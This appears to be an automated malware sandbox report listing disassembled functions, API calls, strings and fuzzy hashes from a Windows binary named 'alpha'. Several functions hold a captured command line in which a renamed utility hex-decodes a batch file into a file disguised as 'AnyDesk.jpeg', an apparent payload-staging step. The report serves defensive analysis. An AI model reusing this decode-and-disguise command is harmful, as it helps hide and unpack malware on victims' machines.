Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CurrentFormatMessageThread
String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
API String ID: 2411632146-3173542853
Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
Instruction ID: ac4c38d14630c56fe9929e5f62f2ccda7ed27d6d5b1af9f2374a9233aa42ee7d
Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
Instruction Fuzzy Hash: 3F618C72A0964282EA64EF51A4645B5A7A0FF44B86FE4113EDE0D03B54DFBCEA50CB20

Function 00007FF7823F93E8 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823E33A8: iswspace.MSVCRT(?,?,00000000,00007FF7823FD6EE,?,?,?,00007FF7823F0632), ref: 00007FF7823E33C0

wcsrchr.MSVCRT ref: 00007FF7823F9465

Part of subcall function 00007FF7823E9158: RtlCaptureContext.NTDLL ref: 00007FF7823E9163
Part of subcall function 00007FF7823E9158: RtlLookupFunctionEntry.NTDLL ref: 00007FF7823E9182
Part of subcall function 00007FF7823E9158: RtlVirtualUnwind.NTDLL ref: 00007FF7823E91CF
Part of subcall function 00007FF7823E9158: __raise_securityfailure.LIBCMT ref: 00007FF7823E9245

wcschr.MSVCRT ref: 00007FF7823F9486
wcsrchr.MSVCRT ref: 00007FF7823F94C1
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823F94E5
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823F94FC
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823F9519
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823F952A
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823F9541
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823F955E
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823F9587
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823F95E1
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823F95FD

Strings

, xrefs: 00007FF7823F95BA

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
String ID:
API String ID: 3829876242-3916222277
Opcode ID: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
Instruction ID: 0482164adcc7bb0307b6bd79035dee3cb905b53062f9d2a002d757b89c67f809
Opcode Fuzzy Hash: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
Instruction Fuzzy Hash: 8161A626B0864286EA54AF11E42017DFBA0FFC9B56F958178DE0D07B94DF7CE845C720

Function 00007FF7823E2B94 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 110COMMON

Download Yara Rule

Strings

GEQ, xrefs: 00007FF7823E2D38
NEQ, xrefs: 00007FF7823E2C82
LSS, xrefs: 00007FF7823E2C9C
LEQ, xrefs: 00007FF7823E2CB6
GTR, xrefs: 00007FF7823E2CD0
EQU, xrefs: 00007FF7823E2C6B
-decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 , xrefs: 00007FF7823E2C2D

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID:
String ID: -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 $EQU$GEQ$GTR$LEQ$LSS$NEQ
API String ID: 0-3224021485
Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
Instruction ID: 8b178debcb7473ae01a460edb649f8a65f6e5f24254e22ac98c752dc488b6dd8
Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
Instruction Fuzzy Hash: 5051AE24A0864395FA507B21E4242B9BBA1BF44B47FE0407AC61E57EA5DFBCA849D730

Function 00007FF7823DFC30 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DFC38
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DFC52
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7823E0181
memset.MSVCRT ref: 00007FF7823ED580
longjmp.MSVCRT ref: 00007FF7823ED59F
memmove.MSVCRT ref: 00007FF7823ED5C4
longjmp.MSVCRT ref: 00007FF7823ED5FC
longjmp.MSVCRT ref: 00007FF7823ED62B
longjmp.MSVCRT ref: 00007FF7823ED660

Strings

0123456789, xrefs: 00007FF7823DFDEE
C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 , xrefs: 00007FF7823DFD7F, 00007FF7823ED585, 00007FF7823ED5CB

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
String ID: 0123456789$C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9
API String ID: 1606811317-344213524
Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
Instruction ID: e00860efbd9c473a3ea2c4e64931b4596ab5695a75c1331ce6ad4181642798bb
Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
Instruction Fuzzy Hash: 8CD1D325E08B4281EA10AB15E8542B9B7A0FF45792FF4417ADE5D13BE8DFBCE845C720

Function 00007FF7824003AC Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 219COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF782400411
memset.MSVCRT ref: 00007FF782400436
memset.MSVCRT ref: 00007FF782400459

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF782400590
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7824005A0
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7824005BB
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7824006F3
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF782400712
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF782400731

Strings

%04X-%04X, xrefs: 00007FF782400698
~, xrefs: 00007FF78240046D

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$ErrorLast$InformationVolume
String ID: %04X-%04X$~
API String ID: 2748242238-2468825380
Opcode ID: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
Instruction ID: 6b1e7de7c1476dc56251e0df0b69927e56c78d98b626bb5d2138891ace3398d7
Opcode Fuzzy Hash: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
Instruction Fuzzy Hash: 08A1D422708BC18AEB65DF21D8502E9B7A1FB85B86F908035DA4D0BB89DF7CD645C720

Function 00007FF7823D9400 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823D9462
memset.MSVCRT ref: 00007FF7823D9485
memset.MSVCRT ref: 00007FF7823D94AA

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823EB6A9

Part of subcall function 00007FF7823E5EE4: memset.MSVCRT ref: 00007FF7823E5F5D
Part of subcall function 00007FF7823E5EE4: towupper.MSVCRT ref: 00007FF7823E5FFE
Part of subcall function 00007FF7823E5EE4: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823E6029

GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D95D3
_wcsicmp.MSVCRT ref: 00007FF7823D9603
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D963D
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D965C
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823EB67A

Strings

~, xrefs: 00007FF7823D94BE
FAT, xrefs: 00007FF7823D95F8

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
String ID: FAT$~
API String ID: 2238823677-1832570214
Opcode ID: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
Instruction ID: fc30206a72f3aeb723b97a568820c2fc98b46d0b2a1d774816f2cc26e7bdfb44
Opcode Fuzzy Hash: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
Instruction Fuzzy Hash: 1671E272708BC19AEB61DF20D8542E9B7A0FB45786FA04078DA4D4BB58DF7CD649C710

Function 00007FF7823FBFEC Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 444COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823E58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7823FC6DB), ref: 00007FF7823E58EF

Part of subcall function 00007FF7823E081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E084E

towupper.MSVCRT ref: 00007FF7823FC1C9
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FC31C
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF7823FC5CB

Strings

PROMPT, xrefs: 00007FF7823FC079
x, xrefs: 00007FF7823FC36B
C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 , xrefs: 00007FF7823FC003
Unknown, xrefs: 00007FF7823FC3AB
\, xrefs: 00007FF7823FC30F
%s , xrefs: 00007FF7823FC3D6
%s>, xrefs: 00007FF7823FC684

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
String ID: %s $%s>$C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 $PROMPT$Unknown$\$x
API String ID: 2242554020-3648267543
Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
Instruction ID: d36a381e16ac579321e2a686f4cf5f238d215a7b8ad130d07d3b50a602b96ca8
Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
Instruction Fuzzy Hash: D412A321A5864281EE64FB15A42017AE3A0FF44BA2FE44679DD5E03BE0DFBCE945D730

Function 00007FF7823E6FB4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823E7013

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823E7123

Part of subcall function 00007FF7823E1EA0: wcschr.MSVCRT(?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF782400D54), ref: 00007FF7823E1EB3

GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E706E
wcsncmp.MSVCRT ref: 00007FF7823E70A5
wcsstr.MSVCRT ref: 00007FF7823EF9DB
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823EFA00
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823EFA5F

Part of subcall function 00007FF7823E823C: FindFirstFileExW.KERNELBASE ref: 00007FF7823E8280
Part of subcall function 00007FF7823E823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823E829D

Part of subcall function 00007FF7823E3A0C: FindClose.KERNELBASE(?,?,?,00007FF7823FEAC5,?,?,?,00007FF7823FE925,?,?,?,?,00007FF7823DB9B1), ref: 00007FF7823E3A56

GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823EFA3D

Strings

\\.\, xrefs: 00007FF7823E7097

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
String ID: \\.\
API String ID: 799470305-2900601889
Opcode ID: 4180f233f4b8de15694120a786ea8bf0d50e59174174331ff54520a46fcb6cef
Instruction ID: 271730f4e5713124116fa76b5f97b8c63fd2872904a0f578f10e2dba372c912e
Opcode Fuzzy Hash: 4180f233f4b8de15694120a786ea8bf0d50e59174174331ff54520a46fcb6cef
Instruction Fuzzy Hash: 5251FC36A087C2A5EB60AF11E4102B9B7A0FB85B46FA54579D90D07F94DFBCD449C720

Function 00007FF7823D8B20 Relevance: 16.8, APIs: 11, Instructions: 254COMMON

Download Yara Rule

APIs

wcsrchr.MSVCRT ref: 00007FF7823D8BAB
_wcsicmp.MSVCRT ref: 00007FF7823D8BD4
_wcsicmp.MSVCRT ref: 00007FF7823D8BF2
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D8C16
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823D8C2F
wcschr.MSVCRT ref: 00007FF7823D8CB3
wcschr.MSVCRT ref: 00007FF7823D8CD7

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
String ID:
API String ID: 1944892715-0
Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
Instruction ID: 0890e85a024417700d4e41c860527261d59ea223de77a8e9f8574da65965236c
Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
Instruction Fuzzy Hash: 95B1DF61A09742D6EA60BF11E464179E6A1FF44B82FE48479CA4E07BD0DEBCF885C730

Function 00007FF7823D5458 Relevance: 16.7, APIs: 11, Instructions: 213fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823E3578: _get_osfhandle.MSVCRT ref: 00007FF7823E3584
Part of subcall function 00007FF7823E3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E359C
Part of subcall function 00007FF7823E3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35C3
Part of subcall function 00007FF7823E3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35D9
Part of subcall function 00007FF7823E3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35ED
Part of subcall function 00007FF7823E3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E3602

_get_osfhandle.MSVCRT ref: 00007FF7823D54DE
WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF7823D1F7D), ref: 00007FF7823D552B
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF7823D1F7D), ref: 00007FF7823D554F
_get_osfhandle.MSVCRT ref: 00007FF7823F345F
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7823D1F7D), ref: 00007FF7823F347E
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7823D1F7D), ref: 00007FF7823F34C3
_get_osfhandle.MSVCRT ref: 00007FF7823F34DB
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7823D1F7D), ref: 00007FF7823F34FA

Part of subcall function 00007FF7823E36EC: _get_osfhandle.MSVCRT ref: 00007FF7823E3715
Part of subcall function 00007FF7823E36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7823E3770
Part of subcall function 00007FF7823E36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E3791

Part of subcall function 00007FF7823D566C: wcschr.MSVCRT ref: 00007FF7823D5690

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
String ID:
API String ID: 1356649289-0
Opcode ID: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
Instruction ID: a902d927f4699f31ae794a6369806cf6ad297b353383e8622069905770ddfa83
Opcode Fuzzy Hash: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
Instruction Fuzzy Hash: D991A532A0864297EB54AF11E414179FBE1FB88B82FA44179DA4E47B91DF7CE484CB20

Function 00007FF782400C90 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 282COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF782401398: free.MSVCRT ref: 00007FF7824013C2
Part of subcall function 00007FF782401398: free.MSVCRT ref: 00007FF7824013DF

Part of subcall function 00007FF7823D2730: towupper.MSVCRT(00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF782400D54), ref: 00007FF7823D27C1

Part of subcall function 00007FF7823D91C0: memset.MSVCRT ref: 00007FF7823D921C
Part of subcall function 00007FF7823D91C0: wcsrchr.MSVCRT ref: 00007FF7823D92D8
Part of subcall function 00007FF7823D91C0: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D9362
Part of subcall function 00007FF7823D91C0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823D9373

Part of subcall function 00007FF7823D8DF8: memset.MSVCRT ref: 00007FF7823D8E6D
Part of subcall function 00007FF7823D8DF8: memset.MSVCRT ref: 00007FF7823D8E93

Part of subcall function 00007FF7823E7854: memset.MSVCRT ref: 00007FF7823E790B

qsort.MSVCRT ref: 00007FF782400DDF
wcschr.MSVCRT ref: 00007FF782400E40
calloc.MSVCRT ref: 00007FF782400EA2
calloc.MSVCRT ref: 00007FF782400F5A
wcschr.MSVCRT ref: 00007FF782400F9E
memmove.MSVCRT ref: 00007FF782401001
memmove.MSVCRT ref: 00007FF782401021

Strings

&()[]{}^=;!%'+,`~, xrefs: 00007FF782400E39, 00007FF782400F97

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
String ID: &()[]{}^=;!%'+,`~
API String ID: 2516562204-381716982
Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
Instruction ID: 1bb1dea77367a6f9ddf20a61b3a2d09d60c539f1004a54ed8011d76f9f46ac1f
Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
